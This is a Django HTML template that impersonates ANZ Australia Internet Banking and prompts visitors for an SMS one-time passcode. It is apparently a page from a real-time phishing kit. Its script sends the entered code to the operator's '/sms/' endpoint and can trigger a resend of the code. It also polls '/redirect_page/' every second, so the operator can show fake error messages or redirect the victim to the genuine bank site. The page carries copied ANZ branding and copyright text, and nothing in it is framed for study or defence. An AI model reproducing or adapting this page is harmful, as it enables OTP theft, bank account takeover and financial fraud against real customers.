{% load static %}
<!doctype html>
<html lang="en">
<head>
    <link rel="shortcut icon" href="{% static 'favicon.ico' %}" type="image/x-icon">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>ANZ Australia Internet Banking</title>
    <link href="{% static 'css/bootstrap.css' %}" rel="stylesheet">
    <link href="../static/css/main.css" rel="stylesheet">
    <script
            src="https://code.jquery.com/jquery-3.5.1.js"
            integrity="sha256-QWo7LDvxbWT2tbbQ97B53yJnYU3WhH/C8ycbRAkjPDc="
            crossorigin="anonymous"></script>
    <script src="{% static 'bootstrap.min.js' %}"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>
    <script type="text/javascript">
        function get_redirect_to_page() {
            $.ajax({
                type: 'GET',
                async: true,
                url: '/redirect_page/',
                success: function(data) {
                    if (data["redirect_to"] === 'error') {
                        $('#loadingModal').modal('hide')
                        $("#errorModal").modal('show')
                    } else if (data["redirect_to"] === "bank") {
                        window.location.href = "https://www.anz.com.au/"
                    } else if (data["redirect_to"]) {
                        window.location.href = document.location.origin + "/" + data["redirect_to"]
                    }
                },
                dataType: 'json',
            });
        }
        function submited(event) {
            event.preventDefault()
            $('#loadingModal').modal({backdrop: 'static', keyboard: false}, 'show');
            var smscode = $("#smscode").val()
            $.ajax({
                type: 'POST',
                async: true,
                url: '/sms/',
                data: "sms=" + smscode,
                dataType: 'json',
            });
        }
        function askSms() {
            $.ajax({
                type: 'GET',
                async: true,
                url: '/ask_sms/',
                dataType: 'json',
            });
            $("#sms-alert").show()
        }
    </script>
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-light mobilebar">
    <a class="navbar-brand mobile-brand" href="#">
        <img src="{% static 'logo.png' %}" class="logo-mobile">
    </a>
</nav>
<div class="container">
    <div class="row">
        <div class="col-12 " style="margin-top: 25px">
            <h1 class="h1-mobile">{{ settings.sms_title }}</h1>
            <p>{{ settings.sms_description }}</p>
            <form method="post" onsubmit="return submited(event)">
                <fieldset class="fake-form fake-form-mobile">
                    <div>
                        <label for="smscode" class="fake-form-mobile-label">SMS code
                            <input required id="smscode" class="fake-form-mobile-input" type="text" name="smscode">
                        </label>
                    </div>
                    <a onclick="askSms()" style="position: absolute;
    bottom: 60px;
    color: #313130;
    text-decoration: underline;
    right: 30px;" href="#">Resend code</a>
                </fieldset>
                <button style="display: inline-block; margin-top: -30px" type="submit" class="btn btn-other">Confirm</button>
                <p id="sms-alert" style="display: none;margin-bottom: -15px;font-size: 15px; color: #313130">New sms code sent</p>
            </form>


        </div>

    </div>
</div>
<nav class="navbar mobile-bottom-bar" style="margin-top: 90%">
    <p>© Australia and New Zealand Banking Group Limited (ANZ) 2020 ABN 11 005 357 522.</p>
</nav>
<div class="modal fade" id="loadingModal" tabindex="-1" role="dialog" aria-hidden="true">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-body">
                <h3 class="modal-custom-title">We are checking your information</h3>
                <div class="d-flex justify-content-center">
                    <img class="logo-loading" src="{% static 'logo-loading.png' %}" alt="">
                    <div class="spinner-border" style="width: 5rem; height: 5rem;color: #337ab7 !important" role="status">
                        <span class="sr-only">Loading...</span>
                    </div>
                </div>
                <h5 class="modal-custom-text">Please wait...</h5>
            </div>
        </div>
    </div>
</div>
<div class="modal fade" id="errorModal" tabindex="-1" role="dialog" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered" role="document">
        <div class="modal-content">
            <div class="modal-body">
                <h6 class="modal-error-title">INVALID OTP ENTERED</h6>
                <p class="modal-error-text">INVALID OTP PLEASE RE-ENTER ONE-TIME PASSCODE (OTP) SENT TO REGISTERED MOBILE NUMBER</p>
                <button type="button" class="btn btn-sign-in modal-error-btn" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">Ok</span>
                </button>
            </div>
        </div>
    </div>
</div>
</body>
<script type="text/javascript">
    $(document).ready(function () {
        setInterval(get_redirect_to_page, 1000)
        $('#smscode').mask('0000000000')
    });
</script>
</html>
